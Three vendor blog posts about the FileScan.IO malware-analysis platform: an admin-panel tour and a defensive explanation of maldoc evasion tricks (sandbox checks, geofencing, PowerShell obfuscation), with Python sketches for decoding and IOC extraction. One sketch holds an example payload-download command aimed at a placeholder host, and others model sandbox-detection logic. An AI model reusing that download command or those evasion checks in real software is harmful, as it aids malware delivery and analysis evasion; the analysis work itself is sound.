Tuesday, August 23, 2022

Behind the curtains: capabilities of the FileScan.IO backend

It's been way too long since we published a blogpost, but our product management and R&D teams have been quite busy over the past year. Our main focus has been on hardening the analysis engine, supporting additional threat types (e.g. our newly added URL analysis capability), growing the community and building an enterprise-grade product. In this short blogpost, we kick off our blog revival and showcase a few capabilities of the admin panel / backend: something most users have not seen yet, as it is only available to admins. Duh. ;)

Accessing the admin panel

When logged in to the webservice as an admin (note: the initial admin is the first user that is set up when deploying a vanilla system), the user menu at the top right will be populated with an "Admin panel" menu item:

The landing page of the admin panel is the "Statistics" sub-page (see top menu) and will look similar to this:

The statistics pages contain a variety of data analytics on the file types seen, total number of active users, top uploaders, uploader count, etc.

The "Errors" subpage also contains a de-duplicated view (with filtering capabilities) of client errors that may be experienced by users. It is a regular go-to place that we visit to pick up on edge cases we had not considered. Note: one of the benefits of operating a public community service is that we receive a very wide range of files/URLs, continuously hardening our system with real-world data.

User Management

User management is a typical interface that shows a paginated list of users with their account status, group name, last login date, etc. For data privacy reasons, we will not include a screenshot. It is worth noting, however, that there is a very configurable user group capability, which allows the admin to create any number of groups and assign permissions. Any user can be a member of one or more groups, and the final access permissions are determined from the aggregate, similar to how users work on un*x systems.

The individual group permissions (i.e. which group is allowed to access which feature) are configurable at the Settings - Feature Access subpage:

Note: as every user is part of the "User" group by default, the "Intel" user will be able to access both basic "Threat intelligence" and "Advanced intelligence" features.
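To make the aggregation concrete, here is a minimal Python sketch of effective permissions computed as the union over all groups a user belongs to. The group-to-feature mapping and the feature identifiers are illustrative assumptions and do not reflect the product's actual data model.

```python
# Hypothetical group -> feature mapping; names are illustrative only.
GROUP_PERMISSIONS = {
    "User": {"threat_intelligence"},
    "Intel": {"advanced_intelligence"},
}


def effective_permissions(groups, group_permissions=GROUP_PERMISSIONS):
    """Return the union of the permissions of all groups a user belongs to."""
    permissions = set()
    for group in groups:
        # Unknown groups simply contribute no permissions.
        permissions |= group_permissions.get(group, set())
    return permissions


# A user in both groups ends up with both features.
print(sorted(effective_permissions(["User", "Intel"])))
```

A union keeps the model additive: joining another group can only grant access, never take it away.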

API Quotas

We have a very extensive API quota settings subpage that allows setting an API quota on either a route or per group basis with very granular configuration options:

OAuth 2.0

A lesser known feature is the ability to allow authentication with the webservice using OAuth 2.0 (such as Google or Azure Active Directory):

In case this feature is enabled, a user will be able to login to the webservice either using the local account or the OAuth 2.0 service provider. Note: an interesting feature is that we allow specifying multiple OAuth providers and automatically detect & merge users with the same identifier.
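The merge behavior can be pictured with a small Python sketch. It assumes that the shared identifier is an e-mail address and that matching is case-insensitive; both are assumptions made for illustration, and the `Account` class and `login` helper are hypothetical names.

```python
from dataclasses import dataclass, field


@dataclass
class Account:
    identifier: str  # assumed to be an e-mail address
    providers: set = field(default_factory=set)


def login(accounts, identifier, provider):
    """Attach a login to the account with the same identifier, creating it if needed."""
    key = identifier.strip().lower()  # normalize so "A@x.io" and "a@x.io" match
    account = accounts.setdefault(key, Account(identifier=key))
    account.providers.add(provider)
    return account


accounts = {}
login(accounts, "alice@example.com", "local")
login(accounts, "Alice@example.com", "google")

# Both logins resolve to a single merged account.
print(len(accounts), sorted(accounts["alice@example.com"].providers))
```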

Scan Sources

Another (new!) webservice feature is the "Scan sources" feature accessible from the top menu. In effect, it allows configuring a webservice to pull in files/URLs from a variety of sources. Currently, we support the configuration of IMAP accounts, which are polled regularly by a background (cron-like) job, with the retrieved content ingested into the webservice. As this is still a work in progress, we will only show a few snippets:

However, setting up an E-Mail scan source is mostly self-explanatory and it's a fully working and implemented feature at this point, part of our next product release.
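For readers curious what IMAP polling involves in general, the following Python sketch uses only the standard library. It is not the webservice's implementation: the function names are hypothetical, and the host, credentials and mailbox are placeholders that a scheduler would supply.

```python
import email
import imaplib
from email.message import EmailMessage


def extract_attachments(raw_message: bytes):
    """Return (filename, payload bytes) for every attachment in a raw e-mail."""
    message = email.message_from_bytes(raw_message)
    attachments = []
    for part in message.walk():
        if part.get_content_disposition() == "attachment":
            attachments.append((part.get_filename(), part.get_payload(decode=True)))
    return attachments


def poll_mailbox(host, user, password, mailbox="INBOX"):
    """Fetch unseen messages once; a cron-like job would call this periodically."""
    found = []
    with imaplib.IMAP4_SSL(host) as conn:
        conn.login(user, password)
        conn.select(mailbox)
        _, data = conn.search(None, "UNSEEN")
        for num in data[0].split():
            _, parts = conn.fetch(num, "(RFC822)")
            found.extend(extract_attachments(parts[0][1]))
    return found


# Offline demonstration with a locally built message (no server needed).
demo = EmailMessage()
demo["Subject"] = "invoice"
demo.set_content("see attachment")
demo.add_attachment(b"MZ\x90", maintype="application",
                    subtype="octet-stream", filename="invoice.exe")
print(extract_attachments(demo.as_bytes()))
```

Keeping the parsing separate from the network code makes the attachment extraction testable without a mail server.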

Other features that are often overlooked

URL Phishing Detection

When submitting a URL, Filescan.io will automatically determine whether it is a "URL to a file" or a webpage. In the case of a regular webpage, a full browser emulation is performed, including machine-learning based image analysis to detect phishing attacks. Here's a great example:


OpenAPI / Python CLI

An extensive API and OpenAPI (OAS3) Documentation is available from the API link at the top menu. You can generate your API key for authorization at the API Key tab of your profile settings. A convenient pip package / CLI tool is available here: https://github.com/filescanio/fsio-cli

Certificate Whitelisting and Validation

Filescan.io extracts certificates not only from PE files, but also from productivity files, such as PDF or VBA macros. All extracted certificates are checked to see whether they are expired, revoked or self-signed. When a certificate is issued by a trusted software vendor, the verdict for that binary artefact is set to benign automatically.
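The three checks and the allowlist decision can be sketched in a few lines of Python. This is a simplified model and not the engine's logic: `CertInfo` is a hypothetical, already-parsed certificate record, the vendor allowlist is made up, and requiring a clean certificate before trusting the vendor is an assumption.

```python
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass
class CertInfo:
    """Hypothetical, already-parsed view of a certificate."""
    subject: str
    issuer: str
    not_after: datetime
    revoked: bool = False


TRUSTED_VENDORS = {"Example Trusted Vendor Inc."}  # made-up allowlist


def certificate_findings(cert, now=None):
    """Return the list of problems found: expired, revoked, self-signed."""
    now = now or datetime.now(timezone.utc)
    findings = []
    if cert.not_after < now:
        findings.append("expired")
    if cert.revoked:
        findings.append("revoked")
    if cert.subject == cert.issuer:
        findings.append("self-signed")
    return findings


def verdict(cert, now=None):
    """Assumption: only a clean certificate from an allowlisted vendor yields benign."""
    if not certificate_findings(cert, now) and cert.subject in TRUSTED_VENDORS:
        return "benign"
    return "no automatic verdict"
```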

Final Words

In this blogpost, a few key areas of the admin panel and backend features were showcased, outlining the maturity of the overall product and its flexibility in terms of ACL and customization.

Do you like what you see at www.filescan.io or in this blogpost and are interested in a live technical demo, data sheets and/or quote? Please get in touch with sales via our company contact form: https://www.filescan.com/contact/sales or E-Mail sales@filescan.io

Disclaimer: all screenshots were taken from a dev staging server populated with test data. Actual commercial product UX may differ slightly.

Sunday, August 29, 2021

FileScan.IO vs. Maldoc Evasion Techniques

Today, malicious documents (so-called "maldocs") are a very common initial attack vector (e.g. as an E-Mail attachment). Over time, threat actors have improved the techniques used in malicious office files to make indicator of compromise (IOC) extraction and general detection more difficult. Such techniques include VBA macro obfuscation, environment and geofencing checks for targeted attacks, anti-analysis tricks (e.g. big sleep / sleep loops) and additional obfuscation layers (e.g. via obfuscated cmd/powershell and vbs/js scripts). Only after all of these layers have been unwrapped and bypassed is the actual payload / malware downloaded from an external host. Thus far, the only solution has been to execute office files within an isolated environment (sandbox) and monitor their behavior (e.g. network connections). This requires a complex setup and is time and resource intensive.

We have taken on the challenge of implementing sophisticated emulators that can unwrap these "matryoshka"-like maldocs at a 10x speed improvement vs. traditional sandboxing solutions.

As part of our free community site launch at FileScan.IO, we want to showcase a few interesting files that contain today's anti-analysis and obfuscation techniques, as well as demonstrate the results of our engine processing those files successfully. For your pleasure, please follow the cross-referenced links in our footer section to dive even deeper into the respective techniques.

Example Techniques (Sample #1)

MD5 531364f5afadcadd83aef3158c100c98
SHA1 a2f60bc02786c316644e353578eab83f5152237c
SHA256 13c54b5e7df8b7127204be84e81d1cba1e73ec56354c6ea961a8c1acf66d0281
FileType Microsoft Word 2007+
FileScan.IO https://www.filescan.io/uploads/612bbbb477c320b029441b65/reports/f1edeb07-8b5d-46c4-a1f8-003b9173fb59/overview

The file implements the following techniques:


Triggering macro code through the InkPicture ActiveX control has been described widely[1] in the industry as a method to execute malicious code when the document is opened on the targeted machine. Instead of using the classic Document_Open or Auto_Open events, the maldoc relies on InkPicture, which belongs to a group of ActiveX controls that will launch VB macro code when the document is opened.

Document name checking 

Certain malware families have implemented checks that read the document name prior to execution, as analysis systems will often rename files prior to analysis[2]. Thus, it is important to analyze a file in an environment as close to the "would be" environment as possible.
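As a rough illustration of what such a check looks for, the Python sketch below flags document names that consist solely of a hex digest. That analysis systems store samples under their hash is an assumption made for this example, and the helper name is hypothetical; real maldocs implement their checks in VBA and may test for other patterns.

```python
import re

# Assumption: renamed samples are stored as MD5/SHA1/SHA256 hex digests.
HASH_NAME = re.compile(r"^(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})$", re.IGNORECASE)


def looks_renamed_by_sandbox(document_name: str) -> bool:
    """Return True if the file name (without extension) is just a hex digest."""
    stem = document_name.rsplit(".", 1)[0]
    return bool(HASH_NAME.match(stem))


print(looks_renamed_by_sandbox("531364f5afadcadd83aef3158c100c98.docx"))
print(looks_renamed_by_sandbox("Invoice_August.docx"))
```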

Recent file count

Another known anti-analysis technique implemented by maldoc authors is to check the total number of recent documents opened by Word historically[3], as a vanilla Windows installation (often used as part of a simple sandbox setup) will have no recent documents and/or very few usage artifacts in general. If the system that analyzes the malware isn't prepared properly, no malicious code will be executed.
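The logic of this check, and why a prepared environment passes it, can be sketched in Python as follows. The `EmulatedOffice` class, the threshold of three documents and the file names are all made up for illustration.

```python
from dataclasses import dataclass, field


@dataclass
class EmulatedOffice:
    """Stand-in for the values a macro can query; all values are made up."""
    recent_files: list = field(default_factory=list)


def macro_would_continue(office, minimum_recent=3):
    """The maldoc-side check: bail out on machines that look unused."""
    return len(office.recent_files) >= minimum_recent


vanilla = EmulatedOffice()
prepared = EmulatedOffice(recent_files=["budget.xlsx", "notes.docx", "cv.docx", "plan.docx"])

# The vanilla environment fails the check, the prepared one passes it.
print(macro_would_continue(vanilla), macro_would_continue(prepared))
```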

Geofencing protection

Some malware campaigns focus on a specific region due to certain interests such as geopolitics. It's common for malware campaigns[4] to implement a technique dubbed geofencing. More precisely, malware will check the region it is being executed in (e.g. by checking the system language or the geolocation of the outbound IP address) before downloading any payloads. As the payload download location (e.g. a specific external host) is the key Indicator of Compromise that an analyst is interested in, failing to bypass such checks is extremely unfortunate. There are means of bypassing such checks in automated systems (e.g. having a list of pre-configured VPN servers to choose from, allowing a specific region to be emulated). However, as the targeted region is often not known a priori, manual inspection of an initial analysis is necessary to understand which system configuration is needed, followed by additional analysis. A very time-consuming task. Wouldn't it be nice to bypass geofencing checks the first time around in a matter of seconds?
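One way to picture why emulation helps here: when the environment is simulated, trying another region costs a function call rather than a new VPN session and a full re-run. The Python sketch below models a language-based geofence and a loop over candidate languages. It only illustrates the idea and is not a description of how the FileScan.IO engine works; the function names and language codes are assumptions.

```python
def make_geofence(allowed_languages):
    """Build a check that passes only for the targeted system languages."""
    allowed = {language.lower() for language in allowed_languages}

    def check(system_language):
        return system_language.lower() in allowed

    return check


def first_passing_language(check, candidates):
    """Try candidate languages in order and return the first one that passes."""
    for language in candidates:
        if check(language):
            return language
    return None


geofence = make_geofence(["ja-JP"])
print(first_passing_language(geofence, ["en-US", "de-DE", "ja-JP"]))
```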

Example Techniques (Sample #2)

MD5 09fb106744ea85876ba65dfad545bccd
SHA1 55c22b2db3a215fcb68956f75d6b24043da5fbf9
SHA256 330a560f492569d5caaf894e4f58b1b797358709a975d6b86361b5dffce3d27f
FileType Microsoft Word 2007+

Powershell obfuscation

The actual payload download is hidden behind an obfuscated PowerShell command line. Typical anti-analysis techniques involve Base64 encoding, GZIP-compressed byte streams, string concatenation tricks and Invoke-Obfuscation.
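Two of these layers are easy to peel off statically. The Python sketch below decodes a PowerShell -EncodedCommand argument (Base64 over UTF-16LE text) and a Base64-wrapped GZIP stream. The nested example is constructed inside the snippet and the URL is a placeholder; real samples usually wrap each layer in additional script code.

```python
import base64
import gzip


def decode_encoded_command(blob: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE text)."""
    return base64.b64decode(blob).decode("utf-16-le")


def decode_gzip_base64(blob: str) -> str:
    """Decode a Base64 string that wraps GZIP-compressed UTF-8 text."""
    return gzip.decompress(base64.b64decode(blob)).decode("utf-8")


# Build a two-layer example so the sketch is self-contained.
inner = "Invoke-WebRequest http://payload.example/stage2"
layer = base64.b64encode(gzip.compress(inner.encode("utf-8"))).decode("ascii")
outer = base64.b64encode(layer.encode("utf-16-le")).decode("ascii")

# Peel the layers in reverse order to recover the original command.
recovered = decode_gzip_base64(decode_encoded_command(outer))
print(recovered)
```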

IOCs hidden behind multiple obfuscation layers

Long sleeps

A typical anti-analysis technique that involves sleeping for a long time before performing additional malicious activity. In this case, a long sleep is performed after sending an HTTP request to the payload delivery host.
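A common way for an emulator to neutralize long sleeps is a virtual clock that advances instantly instead of waiting. The Python sketch below shows the general idea under that assumption; the class, the one-hour sleep and the event names are hypothetical.

```python
class VirtualClock:
    """Clock whose sleep() advances time immediately instead of blocking."""

    def __init__(self):
        self.now = 0.0

    def sleep(self, seconds):
        self.now += seconds  # no real waiting takes place


def run_sample(clock):
    """Toy stand-in for a script that sleeps between two actions."""
    events = ["http_request"]
    clock.sleep(3600)  # the sample asks for a one-hour sleep
    events.append("next_stage")
    return events


clock = VirtualClock()
print(run_sample(clock), clock.now)
```

From the sample's point of view an hour has passed, while the analysis itself did not wait at all.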

Why does the analysis time matter?

Organizations need systems that can extract insights (e.g. IOCs) from the attack chain of files arriving at their perimeters as quickly as possible. Today, the attack surface has become quite broad compared to what was the case in the old economy. While we still have the traditional inbound E-Mails, we also have a wide range of cloud services, network shares, bring-your-own-device ("BYOD") and remote workers connected to poorly secured home networks, among other attack schemes, all of which expose endpoints to unknown files. Therefore, a key challenge is to be able to extract IOCs from a large quantity of incoming files quickly, as that allows instant blocking and internal scanning.

We are excited to present a solution that can beat nearly all known evasion techniques used by cybercriminals in the wild and give insights into a large part of the full attack chain in less than 30 seconds*. This is possible due to our unique and sophisticated proprietary emulation engines, which are capable of analyzing VBA, Powershell, CMD, VBScript and Javascript.

FileScan.IO Analysis Report

The platform provides the user with an overview of the submitted file, including all the results that our engine extracted during the analysis. The summary helps the user understand whether the file is malicious and which signals (our behavior signatures) matched during the analysis:

Emulation Data Results

The most interesting section of FileScan is our emulation engine. As described above, the sample mentioned at the beginning of the article combines several techniques that together turn the file into something that is difficult to analyze automatically all the way to the final stage. When the file is executed on our platform, the system detects the different evasion techniques and beats them in order to obtain the full execution chain:

Our emulation engine is able to detect and beat all the known evasion techniques used and recover the final payload behind this document file:

As can be seen in the screenshot above, the FileScan.IO engine was able to emulate the file and beat all the evasion methods found, obtaining the write event that occurs once the expected scenario is met and the file can be executed.

Indicators of Compromise

All extracted (potential) IOCs from the input file, any emulation layer, extracted/downloaded file, etc. are aggregated and presented in a simple type-ordered overview page from the top left menu.

You can use these IOCs to quickly find related samples, perform additional threat intelligence research, update your security perimeter / firewalls and scan your corporate network for other potentially compromised endpoints.
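To give an idea of what a type-ordered IOC overview looks like in data terms, here is a minimal Python sketch that pulls a few indicator types out of text with regular expressions and groups them by type. The patterns are deliberately simple assumptions for illustration and far less thorough than what a production engine needs; the sample text uses a documentation-range IP address.

```python
import re
from collections import defaultdict

# Simplified patterns; real-world extraction needs many more cases.
PATTERNS = {
    "url": re.compile(r"https?://[^\s\"'<>]+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "sha256": re.compile(r"\b[0-9a-fA-F]{64}\b"),
    "md5": re.compile(r"\b[0-9a-fA-F]{32}\b"),
}


def extract_iocs(text):
    """Return a dict mapping IOC type to a sorted list of unique matches."""
    found = defaultdict(set)
    for kind, pattern in PATTERNS.items():
        found[kind].update(pattern.findall(text))
    # Drop types without any match to keep the overview compact.
    return {kind: sorted(values) for kind, values in found.items() if values}


sample = "GET http://203.0.113.7/payload.exe md5 531364f5afadcadd83aef3158c100c98"
print(extract_iocs(sample))
```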

* the average analysis time is ~15 seconds per file, but outliers remain.

References / Footnotes

Friday, July 9, 2021

Welcome to Next-Gen Malware Analysis

Hey, there! Welcome to our new research lab blog!

We're still in "stealth mode" working on the community service launch, which we hope will be ready soon. The new service we are building is a next-gen malware analysis platform that has the following emphasis:

  • Providing rapid and in-depth file analysis services capable of massive processing
  • Focus on Indicator-of-Compromise (IOC) extraction and actionable context

More information will follow soon.

To start out with a first goodie, here is a desktop background that you can use if you are as excited as we are: